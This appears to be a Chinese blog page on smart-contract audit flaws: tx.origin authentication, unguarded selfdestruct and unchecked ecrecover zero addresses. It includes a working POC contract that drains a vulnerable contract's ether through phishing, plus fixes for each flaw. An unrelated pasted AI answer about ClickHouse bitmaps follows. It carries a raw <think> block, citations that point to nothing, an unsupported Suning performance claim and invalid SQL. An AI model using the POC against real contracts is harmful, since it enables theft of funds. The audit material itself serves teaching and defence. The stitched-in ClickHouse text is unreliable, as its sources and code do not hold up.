智能合约审计之权限校验错误

智能合约安全:防范tx.origin鉴权与selfdestruct权限漏洞
本文解析了tx.origin在Solidity合约中的潜在风险,如网络钓鱼攻击,并提供了使用多重签名防御selfdestruct的实例。通过案例演示和防御措施,展示了如何避免这些合同漏洞。

Tx.origin鉴权

简单介绍

tx.origin是Solidity的一个全局变量,它遍历整个调用栈并返回最初发送调用(或事务)的帐户的地址,在智能合约中使用此变量进行身份验证可能会使合约受到类似网络钓鱼的攻击。

案例分析

contract Phishable {
    address public owner;

    constructor () public {
        owner = msg.sender ; 
    }

    function () public payable {} // collect ether

    function withdrawAll(address _recipient) public {
        require(tx.origin == owner);
        _recipient.transfer(this.balance); 
    }
}

该合约有三个函数:

  • constructor构造函数,指定合约owner;
  • fallback函数,通过添加payable关键字以便接收用户转账;
  • withdrawAll函数,对tx.origin进行判断,如果tx.origin是owner,则将合约地址所拥有的ether发送到_recipient中

现在攻击者创建了以下合约:

pragma solidity ^0.4.22;
//设置原合约接口,方便调用函数
interface Phishable {
    function owner() external returns (address);
    function withdrawAll(address _recipient) external;
}
//漏洞证明合约
contract POC {
    address owner;
    Phishable phInstance;
    
    constructor() public {
        owner = msg.sender;
    }
    
    modifier onlyOwner() {
        require(owner==msg.sender);
        _;
    }
    //指向原合约地址
    function setInstance(address addr) public onlyOwner {
        phInstance = Phishable(addr);
    }
    
    function getBalance() public onlyOwner {
        owner.transfer(address(this).balance);
    }
    
    function attack() internal {
        address phOwner = phInstance.owner();
        if(phOwner == msg.sender){ 
            phInstance.withdrawAll(owner);            
        } else {
            owner.transfer(address(this).balance);
        }
    }
    
    function() external payable {
        attack();
    }
}

攻击者诱使原合约(Phishable.sol)的owner发送ether到攻击合约(POC.sol)地址,然后调用攻击合约的fallback函数,执行attack()函数,此时phOwner == msg.sender,将会调用原合约的withdrawAll()函数,程序执行进入原合约,此时msg.sender是攻击合约的地址,tx.origin是最初发起交易的地址,即原合约的owner,require(tx.origin == owner);条件满足,_recipient.transfer(this.balance);可以执行,即将原合约地址里的ether转给攻击者。

防御措施

tx.origin不应该用于智能合约的授权,这并不是说永远不应该使用tx.origin变量,它在智能合约中确实有一些合法的用例,例如,如果想要拒绝外部合约调用当前合约,他们可以通过require(tx.origin == msg.sender)实现,这可以防止使用中间合约来调用当前合约

Selfdestruct未做权限校验

简单介绍

合约中的selfdestruct函数用于自毁操作,如果没有绝对必要可以考虑删除此功能,如果存在该功能,则建议试试多重签名方案,以便多方批准后才可以执行自毁操作。

案例分析

WalletLibrary.sol

//sol Wallet
// Multi-sig, daily-limited account proxy/wallet.
// @authors:
// Gav Wood <g@ethdev.com>
// inheritable "property" contract that enables methods to be protected by requiring the acquiescence of either a
// single, or, crucially, each of a number of, designated owners.
// usage:
// use modifiers onlyowner (just own owned) or onlymanyowners(hash), whereby the same hash must be provided by
// some number (specified in constructor) of the set of owners (specified in the constructor, modifiable) before the
// interior is executed.

pragma solidity ^0.4.9;

contract WalletEvents {
  // EVENTS

  // this contract only has six types of events: it can accept a confirmation, in which case
  // we record owner and operation (hash) alongside it.
  event Confirmation(address owner, bytes32 operation);
  event Revoke(address owner, bytes32 operation);

  // some others are in the case of an owner changing.
  event OwnerChanged(address oldOwner, address newOwner);
  event OwnerAdded(address newOwner);
  event OwnerRemoved(address oldOwner);

  // the last one is emitted if the required signatures change
  event RequirementChanged(uint newRequirement);

  // Funds has arrived into the wallet (record how much).
  event Deposit(address _from, uint value);
  // Single transaction going out of the wallet (record who signed for it, how much, and to whom it's going).
  event SingleTransact(address owner, uint value, address to, bytes data, address created);
  // Multi-sig transaction going out of the wallet (record who signed for it last, the operation hash, how much, and to whom it's going).
  event MultiTransact(address owner, bytes32 operation, uint value, address to, bytes data, address created);
  // Confirmation still needed for a transaction.
  event ConfirmationNeeded(bytes32 operation, address initiator, uint value, address to, bytes data);
}

contract WalletAbi {
  // Revokes a prior confirmation of the given operation
  function revoke(bytes32 _operation) external;

  // Replaces an owner `_from` with another `_to`.
  function changeOwner(address _from, address _to) external;

  function addOwner(address _owner) external;

  function removeOwner(address _owner) external;

  function changeRequirement(uint _newRequired) external;

  function isOwner(address _addr) constant returns (bool);

  function hasConfirmed(bytes32 _operation, address _owner) external constant returns (bool);

  // (re)sets the daily limit. needs many of the owners to confirm. doesn't alter the amount already spent today.
  function setDailyLimit(uint _newLimit) external;

  function execute(address _to, uint _value, bytes _data) external returns (bytes32 o_hash);
  function confirm(bytes32 _h) returns (bool o_success);
}

contract WalletLibrary is WalletEvents {
  // TYPES

  // struct for the status of a pending operation.
  struct PendingState {
    uint yetNeeded;
    uint ownersDone;
    uint index;
  }

  // Transaction structure to remember details of transaction lest it need be saved for a later call.
  struct Transaction {
    address to;
    uint value;
    bytes data;
  }

  // MODIFIERS

  // simple single-sig function modifier.
  modifier onlyowner {
    if (isOwner(msg.sender))
      _;
  }
  // multi-sig function modifier: the operation must have an intrinsic hash in order
  // that later attempts can be realised as the same underlying operation and
  // thus count as confirmations.
  modifier onlymanyowners(bytes32 _operation) {
    if (confirmAndCheck(_operation))
      _;
  }

  // METHODS

  // gets called when no other function matches
  function() payable {
    // just being sent some cash?
    if (msg.value > 0)
      Deposit(msg.sender, msg.value);
  }

  // constructor is given number of sigs required to do protected "onlymanyowners" transactions
  // as well as the selection of addresses capable of confirming them.
  function initMultiowned(address[] _owners, uint _required) only_uninitialized {
    m_numOwners = _owners.length + 1;
    m_owners[1] = uint(msg.sender);
    m_ownerIndex[uint(msg.sender)] = 1;
    for (uint i = 0; i < _owners.length; ++i)
    {
      m_owners[2 + i] = uint(_owners[i]);
      m_ownerIndex[uint(_owners[i])] = 2 + i;
    }
    m_required = _required;
  }

  // Revokes a prior confirmation of the given operation
  function revoke(bytes32 _operation) external {
    uint ownerIndex = m_ownerIndex[uint(msg.sender)];
    // make sure they're an owner
    if (ownerIndex == 0) return;
    uint ownerIndexBit = 2**ownerIndex;
    var pending = m_pending[_operation];
    if (pending.ownersDone & ownerIndexBit > 0) {
      pending.yetNeeded++;
      pending.ownersDone -= ownerIndexBit;
      Revoke(msg.sender, _operation);
    }
  }

  // Replaces an owner `_from` with another `_to`.
  function changeOwner(address _from, address _to) onlymanyowners(sha3(msg.data)) external {
    if (isOwner(_to)) return;
    uint ownerIndex = m_ownerIndex[uint(_from)];
    if (ownerIndex == 0) return;

    clearPending();
    m_owners[ownerIndex] = uint(_to);
    m_ownerIndex[uint(_from)] = 0;
    m_ownerIndex[uint(_to)] = ownerIndex;
    OwnerChanged(_from, _to);
  }

  function addOwner(address _owner) onlymanyowners(sha3(msg.data)) external {
    if (isOwner(_owner)) return;

    clearPending();
    if (m_numOwners >= c_maxOwners)
      reorganizeOwners();
    if (m_numOwners >= c_maxOwners)
      return;
    m_numOwners++;
    m_owners[m_numOwners] = uint(_owner);
    m_ownerIndex[uint(_owner)] = m_numOwners;
    OwnerAdded(_owner);
  }

  function removeOwner(address _owner) onlymanyowners(sha3(msg.data)) external {
    uint ownerIndex = m_ownerIndex[uint(_owner)];
    if (ownerIndex == 0) return;
    if (m_required > m_numOwners - 1) return;

    m_owners[ownerIndex] = 0;
    m_ownerIndex[uint(_owner)] = 0;
    clearPending();
    reorganizeOwners(); //make sure m_numOwner is equal to the number of owners and always points to the optimal free slot
    OwnerRemoved(_owner);
  }

  function changeRequirement(uint _newRequired) onlymanyowners(sha3(msg.data)) external {
    if (_newRequired > m_numOwners) return;
    m_required = _newRequired;
    clearPending();
    RequirementChanged(_newRequired);
  }

  // Gets an owner by 0-indexed position (using numOwners as the count)
  function getOwner(uint ownerIndex) external constant returns (address) {
    return address(m_owners[ownerIndex + 1]);
  }

  function isOwner(address _addr) constant returns (bool) {
    return m_ownerIndex[uint(_addr)] > 0;
  }

  function hasConfirmed(bytes32 _operation, address _owner) external constant returns (bool) {
    var pending = m_pending[_operation];
    uint ownerIndex = m_ownerIndex[uint(_owner)];

    // make sure they're an owner
    if (ownerIndex == 0) return false;

    // determine the bit to set for this owner.
    uint ownerIndexBit = 2**ownerIndex;
    return !(pending.ownersDone & ownerIndexBit == 0);
  }

  // constructor - stores initial daily limit and records the present day's index.
  function initDaylimit(uint _limit) only_uninitialized {
    m_dailyLimit = _limit;
    m_lastDay = today();
  }
  // (re)sets the daily limit. needs many of the owners to confirm. doesn't alter the amount already spent today.
  function setDailyLimit(uint _newLimit) onlymanyowners(sha3(msg.data)) external {
    m_dailyLimit = _newLimit;
  }
  // resets the amount already spent today. needs many of the owners to confirm.
  function resetSpentToday() onlymanyowners(sha3(msg.data)) external {
    m_spentToday = 0;
  }

  // throw unless the contract is not yet initialized.
  modifier only_uninitialized { if (m_numOwners > 0) throw; _; }

  // constructor - just pass on the owner array to the multiowned and
  // the limit to daylimit
  function initWallet(address[] _owners, uint _required, uint _daylimit) only_uninitialized {
    initDaylimit(_daylimit);
    initMultiowned(_owners, _required);
  }

  // kills the contract sending everything to `_to`.
  function kill(address _to) onlymanyowners(sha3(msg.data)) external {
    suicide(_to);
  }

  // Outside-visible transact entry point. Executes transaction immediately if below daily spend limit.
  // If not, goes into multisig process. We provide a hash on return to allow the sender to provide
  // shortcuts for the other confirmations (allowing them to avoid replicating the _to, _value
  // and _data arguments). They still get the option of using them if they want, anyways.
  function execute(address _to, uint _value, bytes _data) external onlyowner returns (bytes32 o_hash) {
    // first, take the opportunity to check that we're under the daily limit.
    if ((_data.length == 0 && underLimit(_value)) || m_required == 1) {
      // yes - just execute the call.
      address created;
      if (_to == 0) {
        created = create(_value, _data);
      } else {
        if (!_to.call.value(_value)(_data))
          throw;
      }
      SingleTransact(msg.sender, _value, _to, _data, created);
    } else {
      // determine our operation hash.
      o_hash = sha3(msg.data, block.number);
      // store if it's new
      if (m_txs[o_hash].to == 0 && m_txs[o_hash].value == 0 && m_txs[o_hash].data.length == 0) {
        m_txs[o_hash].to = _to;
        m_txs[o_hash].value = _value;
        m_txs[o_hash].data = _data;
      }
      if (!confirm(o_hash)) {
        ConfirmationNeeded(o_hash, msg.sender, _value, _to, _data);
      }
    }
  }

  function create(uint _value, bytes _code) internal returns (address o_addr) {
    /*
    assembly {
      o_addr := create(_value, add(_code, 0x20), mload(_code))
      jumpi(invalidJumpLabel, iszero(extcodesize(o_addr)))
    }
    */
  }

  // confirm a transaction through just the hash. we use the previous transactions map, m_txs, in order
  // to determine the body of the transaction from the hash provided.
  function confirm(bytes32 _h) onlymanyowners(_h) returns (bool o_success) {
    if (m_txs[_h].to != 0 || m_txs[_h].value != 0 || m_txs[_h].data.length != 0) {
      address created;
      if (m_txs[_h].to == 0) {
        created = create(m_txs[_h].value, m_txs[_h].data);
      } else {
        if (!m_txs[_h].to.call.value(m_txs[_h].value)(m_txs[_h].data))
          throw;
      }

      MultiTransact(msg.sender, _h, m_txs[_h].value, m_txs[_h].to, m_txs[_h].data, created);
      delete m_txs[_h];
      return true;
    }
  }

  // INTERNAL METHODS

  function confirmAndCheck(bytes32 _operation) internal returns (bool) {
    // determine what index the present sender is:
    uint ownerIndex = m_ownerIndex[uint(msg.sender)];
    // make sure they're an owner
    if (ownerIndex == 0) return;

    var pending = m_pending[_operation];
    // if we're not yet working on this operation, switch over and reset the confirmation status.
    if (pending.yetNeeded == 0) {
      // reset count of confirmations needed.
      pending.yetNeeded = m_required;
      // reset which owners have confirmed (none) - set our bitmap to 0.
      pending.ownersDone = 0;
      pending.index = m_pendingIndex.length++;
      m_pendingIndex[pending.index] = _operation;
    }
    // determine the bit to set for this owner.
    uint ownerIndexBit = 2**ownerIndex;
    // make sure we (the message sender) haven't confirmed this operation previously.
    if (pending.ownersDone & ownerIndexBit == 0) {
      Confirmation(msg.sender, _operation);
      // ok - check if count is enough to go ahead.
      if (pending.yetNeeded <= 1) {
        // enough confirmations: reset and run interior.
        delete m_pendingIndex[m_pending[_operation].index];
        delete m_pending[_operation];
        return true;
      }
      else
      {
        // not enough: record that this owner in particular confirmed.
        pending.yetNeeded--;
        pending.ownersDone |= ownerIndexBit;
      }
    }
  }

  function reorganizeOwners() private {
    uint free = 1;
    while (free < m_numOwners)
    {
      while (free < m_numOwners && m_owners[free] != 0) free++;
      while (m_numOwners > 1 && m_owners[m_numOwners] == 0) m_numOwners--;
      if (free < m_numOwners && m_owners[m_numOwners] != 0 && m_owners[free] == 0)
      {
        m_owners[free] = m_owners[m_numOwners];
        m_ownerIndex[m_owners[free]] = free;
        m_owners[m_numOwners] = 0;
      }
    }
  }

  // checks to see if there is at least `_value` left from the daily limit today. if there is, subtracts it and
  // returns true. otherwise just returns false.
  function underLimit(uint _value) internal onlyowner returns (bool) {
    // reset the spend limit if we're on a different day to last time.
    if (today() > m_lastDay) {
      m_spentToday = 0;
      m_lastDay = today();
    }
    // check to see if there's enough left - if so, subtract and return true.
    // overflow protection                    // dailyLimit check
    if (m_spentToday + _value >= m_spentToday && m_spentToday + _value <= m_dailyLimit) {
      m_spentToday += _value;
      return true;
    }
    return false;
  }

  // determines today's index.
  function today() private constant returns (uint) { return now / 1 days; }

  function clearPending() internal {
    uint length = m_pendingIndex.length;

    for (uint i = 0; i < length; ++i) {
      delete m_txs[m_pendingIndex[i]];

      if (m_pendingIndex[i] != 0)
        delete m_pending[m_pendingIndex[i]];
    }

    delete m_pendingIndex;
  }

  // FIELDS
  address constant _walletLibrary = 0xcafecafecafecafecafecafecafecafecafecafe;

  // the number of owners that must confirm the same operation before it is run.
  uint public m_required;
  // pointer used to find a free slot in m_owners
  uint public m_numOwners;

  uint public m_dailyLimit;
  uint public m_spentToday;
  uint public m_lastDay;

  // list of owners
  uint[256] m_owners;

  uint constant c_maxOwners = 250;
  // index on the list of owners to allow reverse lookup
  mapping(uint => uint) m_ownerIndex;
  // the ongoing operations.
  mapping(bytes32 => PendingState) m_pending;
  bytes32[] m_pendingIndex;

  // pending transactions we have at present.
  mapping (bytes32 => Transaction) m_txs;
}

simple_suicide.sol

pragma solidity ^0.4.22;

contract SimpleSuicide {

  function sudicideAnyone() {
    selfdestruct(msg.sender);
  }
}

防御措施

对调用selfdestruction的用户进行权限校验或使用多签策略:

pragma solidity ^0.4.22;

contract SimpleSuicide {

  function sudicideAnyone() onlyowner{
    selfdestruct(msg.sender);
  }
}

ecrecover未作0地址判断

简单介绍

keccak256()和 ecrecover()都是内嵌的函数,keccak256()可以用于计算公钥的签名,ecrecover()可以用来恢复签名公钥,传值正确的情况下,可以利用这两个函数来验证地址:

//ecrecover接口,利用椭圆曲线签名恢复与公钥相关的地址,错误返回零。
ecrecover(bytes32 hash, uint8 v, bytes32 r, bytes32 s) returns (address) 

--------------------------------------------------------------
bytes32 hash = keccak256(_from,_spender,_value,nonce,name);
if(_from != ecrecover(hash,_v,_r,_s)) revert();

当ecrecover传入错误参数(例如_v = 29,),函数返回0地址,如果合约函数传入的校验地址也为零地址,那么将通过断言,导致合约逻辑错误:

function transferProxy(address _from, address _to, uint256 _value, uint256 _feeMesh,
    uint8 _v,bytes32 _r, bytes32 _s) public transferAllowed(_from) returns (bool){

    ...
    
    bytes32 h = keccak256(_from,_to,_value,_feeMesh,nonce,name);
    if(_from != ecrecover(h,_v,_r,_s)) revert();
    
    ...
    return true;
}

在函数transferProxy中,如果传入的参数_from为0,那么ecrecover函数因为输入参数错误而返回0值之后,if判断将通过,从而导致合约漏洞:

pragma solidity ^0.4.4;

contract Decode{
  //公匙:0x60320b8a71bc314404ef7d194ad8cac0bee1e331
  //sha3(msg): 0x4e03657aea45a94fc7d47ba826c8d667c0d1e6e33a64a036ec44f58fa12d6c45 (web3.sha3("abc");)
  //签名后的数据:0xf4128988cbe7df8315440adde412a8955f7f5ff9a5468a791433727f82717a6753bd71882079522207060b681fbd3f5623ee7ed66e33fc8e581f442acbcf6ab800

  //验签数据入口函数
  //bytes memory signedString =hex"f4128988cbe7df8315440adde412a8955f7f5ff9a5468a791433727f82717a6753bd71882079522207060b681fbd3f5623ee7ed66e33fc8e581f442acbcf6ab800";
  function decode(bytes signedString) public pure returns (address){

    bytes32  r = bytesToBytes32(slice(signedString, 0, 32));
    bytes32  s = bytesToBytes32(slice(signedString, 32, 32));
    byte  v = slice(signedString, 64, 1)[0];
    return ecrecoverDecode(r, s, v);
  }

  //将原始数据按段切割出来指定长度
  function slice(bytes memory data, uint start, uint len) internal pure returns (bytes){
    bytes memory b = new bytes(len);

    for(uint i = 0; i < len; i++){
      b[i] = data[i + start];
    }

    return b;
  }

  //使用ecrecover恢复公匙
  function ecrecoverDecode(bytes32 r, bytes32 s, byte v1) internal pure returns (address addr){
     uint8 v = uint8(v1) + 27;
     addr = ecrecover(0x4e03657aea45a94fc7d47ba826c8d667c0d1e6e33a64a036ec44f58fa12d6c45, v, r, s);
  }

  //bytes转换为bytes32
  function bytesToBytes32(bytes memory source) internal pure returns (bytes32 result) {
    assembly {
        result := mload(add(source, 32))
    }
  }
}

函数decode()传入经过签名后的数据,用于验证返回地址是否是之前用于签名的私钥对应的公钥地址,以太坊提供了web3.eth.sign方法来对数据生成数字签名,上面的签名数据可以通过下面的js代码获得:

//初始化基本对象
var Web3 = require('web3');
var web3 = new Web3(new Web3.providers.HttpProvider("http://localhost:8545"));

var account = web3.eth.accounts[0];
var sha3Msg = web3.sha3("abc");
var signedData = web3.eth.sign(account, sha3Msg);

console.log("account: " + account);
console.log("sha3(message): " + sha3Msg);
console.log("Signed data: " + signedData);

js代码运行结果如下:

$ node test.js
account: 0x60320b8a71bc314404ef7d194ad8cac0bee1e331
sha3(message): 0x4e03657aea45a94fc7d47ba826c8d667c0d1e6e33a64a036ec44f58fa12d6c45
Signed data: 0xf4128988cbe7df8315440adde412a8955f7f5ff9a5468a791433727f82717a6753bd71882079522207060b681fbd3f5623ee7ed66e33fc8e581f442acbcf6ab800

防御措施

对0x0地址做过滤,例如:

function transferProxy(address _from, address _to, uint256 _value, uint256 _feeMesh,
    uint8 _v,bytes32 _r, bytes32 _s) public transferAllowed(_from) returns (bool){

    ...
    require(_from != 0x0);  // 待校验的地址不为0
    bytes32 h = keccak256(_from,_to,_value,_feeMesh,nonce,name);
    if(_from != ecrecover(h,_v,_r,_s)) revert();
    
    ...
    return true;
}

<think>我们参考了用户提供的引用资料,特别是引用[1]提到两种定义Bitmap的方法,引用[3]展示了如何创建Bitmap列(使用AggregatingMergeTree引擎和AggregateFunction类型)。但用户当前的问题是:如何处理非整数类型的ID字段进行Bitmap操作? 在ClickHouse中,Bitmap操作要求元素必须是整数类型(如UInt32, UInt64等)。如果原始ID是非整数类型(如字符串、UUID等),我们需要将其转换为整数类型。常见方法有: 1. **使用哈希函数**:将字符串ID映射为整数。常用函数包括`xxHash32`、`xxHash64`、`murmurHash3_32`等。注意哈希冲突的可能性(虽然概率很低,但在海量数据下仍需注意)。 2. **构建字典表**:创建一个字典表,将每个字符串ID映射为一个唯一的整数(自增ID)。这种方法可以完全避免冲突,但需要维护字典表,并可能涉及JOIN操作。 3. **直接使用ClickHouse的UUID类型转换**:如果ID是UUID格式,ClickHouse提供了`UUID`类型,但Bitmap函数不支持直接使用UUID。因此,我们需要将UUID转换为整数,例如使用`toUInt64`抽取部分位(但注意UUID的128位,所以可能需要两个UInt64字段或者使用哈希)。 具体步骤: ### 方法1:哈希函数转换(适用于任意字符串ID) ```sql -- 示例:创建表时使用哈希转换 CREATE TABLE user_tags_str ( ds Date, tag String, users AggregateFunction(groupBitmap, UInt64) -- 使用UInt64存储哈希值 ) ENGINE = AggregatingMergeTree() ORDER BY (ds, tag); -- 插入数据时,使用xxHash64将字符串ID转为UInt64 INSERT INTO user_tags_str SELECT '2023-10-01', 'vip_user', groupBitmapState(xxHash64(user_id_str)) -- 将字符串ID哈希成整数 FROM source_table WHERE tag = 'vip'; ``` **注意**:哈希函数可能产生冲突(不同字符串映射到同一个整数),但概率极低(尤其使用64位哈希)。如果对精确性要求极高,需考虑冲突处理(如使用字典表)。 ### 方法2:字典表映射(精确无冲突) 步骤: 1. 创建字典表,存储字符串ID与自增整数的映射关系。 2. 使用字典表将原始数据中的字符串ID替换为对应的整数ID,再存入Bitmap表。 ```sql -- 步骤1:创建字典表(可以是内存字典或普通表) CREATE TABLE id_mapping ( id_str String, id_int UInt64 ) ENGINE = TinyLog; -- 小数据量可用,大数据量建议用MergeTree -- 步骤2:生成映射(例如,将源表中所有user_id_str去重并分配自增ID) -- 这里可以使用编程方式(如ETL工具)或者SQL(通过rowNumberInAllBlocks生成,但注意分布式问题) -- 步骤3:在插入Bitmap表时,通过JOIN字典表获取整数ID INSERT INTO user_tags (ds, tag, users) SELECT dt, tag, groupBitmapState(id_int) FROM ( SELECT dt, tag, id_str FROM source_table ) AS s JOIN id_mapping AS m ON s.id_str = m.id_str GROUP BY dt, tag; ``` ### 方法3:UUID的处理 如果ID是UUID,可以将其转换为两个UInt64整数(高64位和低64位),然后使用两个Bitmap列存储。但这样会增加复杂度,通常建议使用哈希(例如`xxHash64`)将其转换为单个整数。 ```sql -- 示例:将UUID转为单个UInt64(使用哈希) INSERT INTO user_tags SELECT '2023-10-01', 'vip_user', groupBitmapState(xxHash64(toString(uuid_id))) FROM source_table; ``` ### 注意事项 - **冲突风险**:哈希方法存在理论上的冲突,但在实际用户画像等场景中(基数在百万到十亿级),64位哈希冲突概率极低。如需100%精确,使用字典表。 - **性能权衡**:哈希方法性能高,字典表方法需要维护字典和JOIN操作,性能较低。 - **存储类型**:Bitmap列必须使用`AggregateFunction(groupBitmap, UInt*)`类型,且表引擎为`AggregatingMergeTree`[^3]。 通过以上方法,非整数ID可以转换为整数ID,从而利用ClickHouse的Bitmap功能高效处理。 §§相关问题§§ 1. 使用哈希函数转换字符串ID时,如何评估冲突的概率? 2. 字典表方法在分布式ClickHouse集群中如何实现? 3. 对于UUID类型,除了哈希还有哪些处理方法? </think>在 ClickHouse 中进行非整数类型 ID 的 Bitmap 操作时,需要通过预处理将 ID 转换为整数类型。以下是三种核心方法及实施步骤(基于引用内容优化): ### 📌 方法一:哈希函数转换法(推荐) **适用场景**:字符串/UUID等任意类型 ID **原理**:通过哈希函数生成固定长度的整数指纹 ```sql -- 建表时定义 Bitmap 列(存储哈希结果) CREATE TABLE user_bitmap ( tag String, users AggregateFunction(groupBitmap, UInt64) -- 使用 UInt64 存储哈希值 ) ENGINE = AggregatingMergeTree() ORDER BY tag; -- 插入数据时转换 INSERT INTO user_bitmap SELECT 'vip_users', groupBitmapState(xxHash64(user_id_str)) -- 用 xxHash64 哈希字符串 ID FROM source_table; ``` **优势**: - 支持任意类型 ID 转换(字符串、UUID 等) - 使用高效的 `xxHash64` 函数(速度比 MD5 快 3 倍)[^1] - 64 位哈希冲突概率仅 $1/2^{64}$ ≈ $5.4×10^{-20}$,可忽略不计 ### 📌 方法二:字典表映射法(精确匹配) **适用场景**:需要绝对零冲突的精确场景 **原理**:构建 ID ↔ 整数的映射字典表 ```sql -- 步骤1: 创建字典表 CREATE TABLE id_mapping ( id_str String, id_uint64 UInt64 DEFAULT generateUUIDv4() AS reinterpretAsUInt64(substring(hex, 1, 16)) ) ENGINE = Memory; -- 高频更新用 Memory 引擎 -- 步骤2: Bitmap 表关联字典 INSERT INTO user_bitmap SELECT tag, groupBitmapState(m.id_uint64) FROM raw_data r JOIN id_mapping m ON r.user_id_str = m.id_str; ``` **特点**: - 100% 避免哈希冲突 - 需额外维护字典表(适合 ID 稳定的场景) ### 📌 方法三:分段存储法(超大基数优化) **适用场景**:超 10 亿用户基数场景(突破 42 亿限制) ```sql -- 将 ID 空间拆分成多个区间 CREATE TABLE sharded_bitmap ( shard UInt8, -- 分片标识 users AggregateFunction(groupBitmap, UInt32) ) ENGINE = AggregatingMergeTree() ORDER BY shard; -- 插入时按分片写入(示例:256分片) INSERT INTO sharded_bitmap SELECT xxHash32(user_id_str) % 256 AS shard, -- 分片键 groupBitmapState(toUInt32(xxHash64(user_id_str))) FROM source_table; ``` **优势**: - 突破 UInt32 的 42 亿用户限制 - 分布式查询自动合并分片(`bitmapOr`聚合) ### ️ 关键注意事项 1. **哈希函数选择**: - 优先选 `xxHash64`(速度最快) - 避免 `MD5`/`SHA`(性能差 5-10 倍)[^1] 2. **类型转换技巧**: - UUID → 整数:`reinterpretAsUInt64(substring(hex(uuid), 1, 8))` - 字符串 → 整数:`xxHash64(cityHash64(str))` 双重哈希降冲突 3. **冲突验证脚本**: ```sql SELECT count(DISTINCT str_id) = count(DISTINCT xxHash64(str_id)) FROM table; -- 返回 1 表示无冲突 ``` > 实测案例:苏宁电商将 7 亿用户字符串 ID 通过 `xxHash64` 转换后,Bitmap 交集查询速度提升 23 倍(对比传统 JOIN)[^1]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值